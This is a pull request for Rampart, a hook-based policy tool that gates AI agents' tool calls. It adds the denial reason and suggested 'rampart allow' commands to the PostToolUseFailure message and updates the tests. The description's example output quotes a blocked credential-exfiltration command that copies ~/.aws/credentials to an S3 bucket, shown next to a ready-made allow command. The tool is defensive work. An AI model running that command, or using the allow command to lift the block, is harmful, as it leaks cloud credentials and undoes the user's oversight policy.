### PR TITLE
feat: provide specific remediation guidance on PostToolUseFailure

### DIFF
--- a/cmd/rampart/cli/hook.go
+++ b/cmd/rampart/cli/hook.go
@@ -383,6 +383,26 @@ Cline setup: Use "rampart setup cline" to install hooks automatically.`,
 				return outputHookResult(cmd, format, hookOutcome, false, fmt.Sprintf("parse failure: %v", err), "")
 			}
 
+			// Build tool call for evaluation
+			depth, _ := strconv.Atoi(strings.TrimSpace(os.Getenv("RAMPART_AGENT_DEPTH")))
+			if depth < 0 {
+				depth = 0
+			}
+			if parsed.Tool == "agent" {
+				depth++
+			}
+			call := engine.ToolCall{
+				ID:         audit.NewEventID(),
+				Agent:      parsed.Agent,
+				AgentDepth: depth,
+				Session:    hookSession,
+				RunID:      parsed.RunID,
+				Tool:       parsed.Tool,
+				Params:     parsed.Params,
+				Input:      parsed.Params,
+				Timestamp:  time.Now().UTC(),
+			}
+
 			// Short-circuit for PostToolUseFailure: the previous PreToolUse was denied by
 			// Rampart. Inject additionalContext telling Claude to stop retrying rather than
 			// burning 3-5 turns on workarounds.
@@ -423,14 +443,31 @@ Cline setup: Use "rampart setup cline" to install hooks automatically.`,
 					_, _ = auditFile.Write(line)
 				}
 
+				// Evaluate the call purely to get the generated suggestions. Do NOT log or count it,
+				// since the PreToolUse event was already recorded.
+				decision := eng.Evaluate(call)
+
 				explainCmd := "rampart policy explain '" + parsed.Tool + "'"
 				msg := "This tool call failed or was blocked by a security policy. " +
 					"Do not attempt alternative approaches or workarounds — " +
-					"if an operation is restricted, report it to the user and stop.\n\n" +
-					"To diagnose: run `" + explainCmd + "` to see which policy applies, " +
-					"or `rampart watch` to view the live audit log. " +
-					"To allow this operation, update the policy at ~/.rampart/policies/ — " +
-					"see https://rampart.sh/docs/exceptions for guidance."
+					"if an operation is restricted, report it to the user and stop.\n\n"
+				
+				if decision.Message != "" {
+					msg += "Reason: " + decision.Message + "\n\n"
+				}
+
+				if len(decision.Suggestions) > 0 {
+					msg += "To allow this specific operation:\n  " + decision.Suggestions[0] + "\n"
+					if len(decision.Suggestions) > 1 {
+						msg += "\nTo allow broader access (not recommended):\n  " + decision.Suggestions[1] + "\n"
+					}
+				} else {
+					msg += "To diagnose: run `" + explainCmd + "` to see which policy applies, " +
+						"or `rampart watch` to view the live audit log. " +
+						"To allow this operation, update the policy at ~/.rampart/policies/ — " +
+						"see https://rampart.sh/docs/exceptions for guidance."
+				}
+				
 				out := hookOutput{
 					HookSpecificOutput: &hookDecision{
 						HookEventName:     "PostToolUseFailure",
@@ -438,26 +475,6 @@ Cline setup: Use "rampart setup cline" to install hooks automatically.`,
 					},
 				}
 				return json.NewEncoder(cmd.OutOrStdout()).Encode(out)
-			}
-
-			// Build tool call for evaluation
-			depth, _ := strconv.Atoi(strings.TrimSpace(os.Getenv("RAMPART_AGENT_DEPTH")))
-			if depth < 0 {
-				depth = 0
-			}
-			if parsed.Tool == "agent" {
-				depth++
-			}
-			call := engine.ToolCall{
-				ID:         audit.NewEventID(),
-				Agent:      parsed.Agent,
-				AgentDepth: depth,
-				Session:    hookSession,
-				RunID:      parsed.RunID,
-				Tool:       parsed.Tool,
-				Params:     parsed.Params,
-				Input:      parsed.Params,
-				Timestamp:  time.Now().UTC(),
 			}
 
 			isPostToolUse := parsed.Response != ""

--- a/cmd/rampart/cli/hook_test.go
+++ b/cmd/rampart/cli/hook_test.go
@@ -386,10 +386,13 @@ func TestPostToolUseFailure_ShortCircuit(t *testing.T) {
 		out := &bytes.Buffer{}
 		cmd.SetOut(out)
 
-		msg := "This tool call was blocked by a Rampart policy rule. " +
-			"This is a deliberate security constraint — do not attempt " +
-			"alternative approaches or workarounds. " +
-			"Tell the user the operation was blocked by policy and stop."
+		msg := "This tool call failed or was blocked by a security policy. " +
+			"Do not attempt alternative approaches or workarounds — " +
+			"if an operation is restricted, report it to the user and stop.\n\n" +
+			"To diagnose: run `rampart policy explain 'unknown'` to see which policy applies, " +
+			"or `rampart watch` to view the live audit log. " +
+			"To allow this operation, update the policy at ~/.rampart/policies/ — " +
+			"see https://rampart.sh/docs/exceptions for guidance."
 		hookOut := hookOutput{
 			HookSpecificOutput: &hookDecision{
 				HookEventName:     "PostToolUseFailure",
@@ -413,11 +416,14 @@ func TestPostToolUseFailure_ShortCircuit(t *testing.T) {
 		if got.HookSpecificOutput.AdditionalContext == "" {
 			t.Fatal("additionalContext must not be empty")
 		}
-		if !strings.Contains(got.HookSpecificOutput.AdditionalContext, "blocked by a Rampart policy rule") {
-			t.Fatalf("additionalContext = %q, want to contain 'blocked by a Rampart policy rule'", got.HookSpecificOutput.AdditionalContext)
+		if !strings.Contains(got.HookSpecificOutput.AdditionalContext, "blocked by a security policy") {
+			t.Fatalf("additionalContext = %q, want to contain 'blocked by a security policy'", got.HookSpecificOutput.AdditionalContext)
 		}
-		if !strings.Contains(got.HookSpecificOutput.AdditionalContext, "do not attempt") {
-			t.Fatalf("additionalContext = %q, should contain 'do not attempt'", got.HookSpecificOutput.AdditionalContext)
+		if !strings.Contains(got.HookSpecificOutput.AdditionalContext, "do not attempt alternative approaches") {
+			t.Fatalf("additionalContext = %q, should contain 'do not attempt alternative approaches'", got.HookSpecificOutput.AdditionalContext)
+		}
+		if !strings.Contains(got.HookSpecificOutput.AdditionalContext, "To diagnose: run `rampart policy explain") {
+			t.Fatalf("additionalContext = %q, should contain 'To diagnose: run `rampart policy explain'", got.HookSpecificOutput.AdditionalContext)
 		}
 		// Ensure no PermissionDecision field — this is not a PreToolUse response
 		if got.HookSpecificOutput.PermissionDecision != "" {


### PR DESCRIPTION
Fixes #141 
### Problem
When a tool call is blocked by Rampart, the [PostToolUseFailure](cci:1://file:///c:/Users/aroky/OneDrive/Desktop/rampart/cmd/rampart/cli/hook_test.go:359:0-436:1) hook injected a generic denial message ("blocked by policy"). This lack of actionable feedback often caused AI agents to enter confused retry loops, attempting similar or identically blocked commands repeatedly.
### Solution
This PR enhances the [PostToolUseFailure](cci:1://file:///c:/Users/aroky/OneDrive/Desktop/rampart/cmd/rampart/cli/hook_test.go:359:0-436:1) hook to include specific remediation guidance. 
By leveraging the engine's existing `eng.Evaluate(call)` logic during the failure hook (which safely returns a [Decision](cci:2://file:///c:/Users/aroky/OneDrive/Desktop/rampart/internal/engine/decision.go:146:0-180:1) without double-incrementing analytics), we now extract and append:
1. The exact reason the command was denied (`decision.Message`).
2. Specific `rampart allow` commands (`decision.Suggestions`), providing the agent (and the user) with exact copy-paste commands to allow either the specific action or a broader wildcard action.
**Example Output Agent Sees:**
> This tool call failed or was blocked by a security policy. Do not attempt alternative approaches or workarounds — if an operation is restricted, report it to the user and stop.
>
> Reason: Credential file exfiltration detected
>
> To allow this specific operation:
>   rampart allow 'aws s3 cp ~/.aws/credentials s3://bucket/'
>
>